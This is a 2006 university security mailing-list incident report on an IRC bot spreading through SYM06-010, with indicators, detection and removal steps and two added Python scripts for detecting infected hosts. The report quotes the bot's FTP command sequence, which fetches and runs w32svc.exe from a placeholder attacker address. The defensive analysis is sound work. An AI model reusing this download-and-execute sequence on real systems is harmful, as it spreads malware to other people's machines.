[unisog] More: Bot outbreak exploiting SYM06-010

Liu, David daliu at grey.com
Tue Nov 28 05:09:25 GMT 2006


Any idea on if the malware info has been made public on the Symantec
site?

-----Original Message-----
From: unisog-bounces at lists.dshield.org
[mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
Sent: Monday, November 27, 2006 7:02 PM
To: UNIversity Security Operations Group
Subject: [unisog] More: Bot outbreak exploiting SYM06-010

We had a number of hosts become infected with an IRC bot today that used
www.flackware.info as the Command and Control. Here is information that
I know so far:

===================
Command and Control
===================
. www.flackware.info:6667/tcp (the only apparent name/port used)
. (auto)JOIN #text airforce

=========
File Info
=========
. MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
. w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
. Symantec definitions 11/27/2006 rev.50 and later will detect it as a
Spybot variant

=============
How to Obtain
=============
The bot uses a built-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
spread. When it compromises a machine, it executes the following
commands:

echo open (ip address of attacker) (ftp server port) > i
echo user 1 1 >> i
echo get w32svc.exe >> i
echo quit >> i
ftp -As:i
w32svc.exe
exit

========
When Run
========
. Installs itself to %WINDIR%\w32svc.exe
. Sets Windows File Protection to "Scan only at bootup"
. Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
and backup.tftp
. Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
. Attempts to connect to the Command and Control server
. Installs itself as a service in many places within the registry

=================
Infection Vectors
=================
. Almost certainly via SYM06-010
. Almost certainly other Windows vulnerabilities (since patched)

==============================
Detecting Infections - Network
==============================
. Looking for DNS queries for www.flackware.info
. Looking for network traffic to port 6667/tcp going to the IP address
for www.flackware.info
. Looking for scanning (more than 3-4 destinations) on port 2967/tcp

=======================================
Identifying Infection - At the Computer
=======================================
. Look for %WINDIR%\w32svc.exe
. Look for a Service called "Windows Network Firewall"

=======
Removal
=======
Symantec definitions 11/27/2006 rev.50 performed admirably on my test
box. Assuming the host did not have any other malware loaded onto it
after infection, updating the AV defs to that "rev" or later, scanning
the hard drive, then rebooting when prompted should do the trick.

Manual Removal: Set the "Windows Network Firewall" service to
"Disabled", and reboot (you can't stop the service while it is running).
Delete the w32svc.exe file, and preferably, remove the associated
(dozens of) registry keys.

Brian

-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
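The three network indicators in the quoted report (DNS lookups of the C2 name, 6667/tcp flows to its address, and fan-out on 2967/tcp) can be turned into a small log triage, as in this added example. It is editor-written, not code from Brian Eckman, UNISOG or Symantec. The hostname, ports and "more than 3-4 destinations" rule are taken from the report; the log formats, the sample lines and the address 192.0.2.10 standing in for whatever www.flackware.info resolved to are constructed assumptions.

```python
from collections import defaultdict

# Indicators taken from the report.
C2_HOST = "www.flackware.info"
C2_PORT = 6667
SCAN_PORT = 2967
SCAN_THRESHOLD = 3  # "more than 3-4 destinations": flag a source at 4 or more

# Assumed: the address the C2 name resolved to (constructed, documentation range).
C2_IP = "192.0.2.10"

# Constructed sample logs.  Assumed formats:
#   DNS:  "<client_ip> <query_name>"
#   Flow: "<src_ip> <dst_ip> <proto> <dst_port>"
DNS_LOG = """\
10.1.2.3 www.flackware.info.
10.1.2.3 time.windows.com.
10.1.9.9 www.flackware.info
10.1.5.5 www.example.com
""".splitlines()

FLOW_LOG = """\
10.1.2.3 192.0.2.10 tcp 6667
10.1.2.3 10.1.2.4 tcp 2967
10.1.2.3 10.1.2.5 tcp 2967
10.1.2.3 10.1.2.6 tcp 2967
10.1.2.3 10.1.2.7 tcp 2967
10.1.5.5 10.1.2.8 tcp 2967
10.1.5.5 10.1.2.9 tcp 2967
10.1.9.9 192.0.2.10 udp 6667
10.1.9.9 10.1.2.4 tcp 80
""".splitlines()


def dns_hits(dns_lines):
    """Clients that queried the C2 hostname (trailing dot and case tolerated)."""
    hits = set()
    for line in dns_lines:
        parts = line.split()
        if len(parts) >= 2 and parts[1].rstrip(".").lower() == C2_HOST:
            hits.add(parts[0])
    return hits


def _parse_flow(line):
    """Return (src, dst, proto, dport) or None for a line that does not parse."""
    parts = line.split()
    if len(parts) != 4:
        return None
    src, dst, proto, dport = parts
    try:
        return src, dst, proto.lower(), int(dport)
    except ValueError:
        return None


def c2_connections(flow_lines, c2_ip=C2_IP):
    """Sources with TCP flows to the C2 address on the IRC port."""
    hits = set()
    for line in flow_lines:
        flow = _parse_flow(line)
        if flow and flow[1] == c2_ip and flow[2] == "tcp" and flow[3] == C2_PORT:
            hits.add(flow[0])
    return hits


def scanners(flow_lines, threshold=SCAN_THRESHOLD):
    """Sources that touched more than `threshold` distinct hosts on 2967/tcp."""
    targets = defaultdict(set)
    for line in flow_lines:
        flow = _parse_flow(line)
        if flow and flow[2] == "tcp" and flow[3] == SCAN_PORT:
            targets[flow[0]].add(flow[1])
    return {src: len(dsts) for src, dsts in targets.items() if len(dsts) > threshold}


def triage(dns_lines, flow_lines):
    """Combine the three checks into one list of reasons per suspect host."""
    d, c, s = dns_hits(dns_lines), c2_connections(flow_lines), scanners(flow_lines)
    report = {}
    for host in d | c | set(s):
        reasons = []
        if host in d:
            reasons.append("dns:" + C2_HOST)
        if host in c:
            reasons.append(f"c2:{C2_PORT}/tcp")
        if host in s:
            reasons.append(f"scan:{s[host]} hosts on {SCAN_PORT}/tcp")
        report[host] = reasons
    return report


if __name__ == "__main__":
    for host, reasons in sorted(triage(DNS_LOG, FLOW_LOG).items()):
        print(host, ", ".join(reasons))
```

A host that only shows the DNS lookup (10.1.9.9 in the sample) is worth a look but not proof of infection; the combination of the lookup, a 6667/tcp session and 2967/tcp fan-out (10.1.2.3) is what the report describes, so the three reasons are kept separate rather than collapsed into one score.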

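For the host-side indicators in the quoted "When Run" and "Identifying Infection - At the Computer" sections, this added example checks a Windows directory for the dropped file (comparing its MD5 and size against the values in the report), the relocated ftp.exe/tftp.exe copies, and the service name. It is editor-written, not code from the report's author or from Symantec; the caller supplies the %WINDIR% path and the list of service names (from `sc query`, Get-Service or an offline image) so the check also runs against a mounted disk, and `demo()` builds a constructed, harmless fake directory to exercise it.

```python
import hashlib
import os
import tempfile

# Indicators taken from the report.
BOT_FILE = "w32svc.exe"
BOT_MD5 = "44a48fb5813d79c9a733bc941a9a548f"
BOT_SIZE = 1182208
BOT_SERVICE = "Windows Network Firewall"
# Where the bot moves the original ftp.exe / tftp.exe (relative to %WINDIR%).
BACKUP_SUBDIR = os.path.join("System32", "Microsoft")
BACKUP_NAMES = ("backup.ftp", "backup.tftp")


def md5_of(path):
    """Stream a file through MD5 so a 1.1 MB sample is not read at once."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_host(windir, service_names):
    """Return a list of (indicator, detail) tuples for the artifacts the report lists.

    windir:        the host's %WINDIR%, or the Windows directory of a mounted image.
    service_names: installed service display names, gathered by the caller.
    """
    findings = []

    bot_path = os.path.join(windir, BOT_FILE)
    if os.path.isfile(bot_path):
        digest = md5_of(bot_path)
        size = os.path.getsize(bot_path)
        if digest == BOT_MD5 and size == BOT_SIZE:
            verdict = "matches the reported sample"
        else:
            verdict = "present but does not match the reported hash/size (variant?)"
        findings.append(("file", f"{bot_path}: {size} bytes, md5={digest}; {verdict}"))

    for name in BACKUP_NAMES:
        moved = os.path.join(windir, BACKUP_SUBDIR, name)
        if os.path.isfile(moved):
            findings.append(("moved_tool", moved))

    wanted = BOT_SERVICE.lower()
    if any(s.strip().lower() == wanted for s in service_names):
        findings.append(("service", BOT_SERVICE))

    return findings


def demo():
    """Build a throwaway fake %WINDIR% (constructed text files, not malware) and run the check."""
    with tempfile.TemporaryDirectory() as windir:
        os.makedirs(os.path.join(windir, BACKUP_SUBDIR))
        with open(os.path.join(windir, BOT_FILE), "wb") as f:
            f.write(b"placeholder, not the real sample")
        with open(os.path.join(windir, BACKUP_SUBDIR, "backup.ftp"), "wb") as f:
            f.write(b"placeholder for the relocated ftp.exe")
        return check_host(windir, ["Workstation", "Windows Network Firewall"])


if __name__ == "__main__":
    for kind, detail in demo():
        print(kind, detail)
```

A hash mismatch on a file at that path is still a finding: the report's MD5 identifies one build, and the "variant?" wording keeps the analyst from dismissing a repacked copy. The service finding matters for cleanup too, since the report notes the service cannot be stopped while running and has to be set to Disabled before a reboot.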

_______________________________________________
unisog mailing list
unisog at lists.dshield.org
https://lists.sans.org/mailman/listinfo/unisog
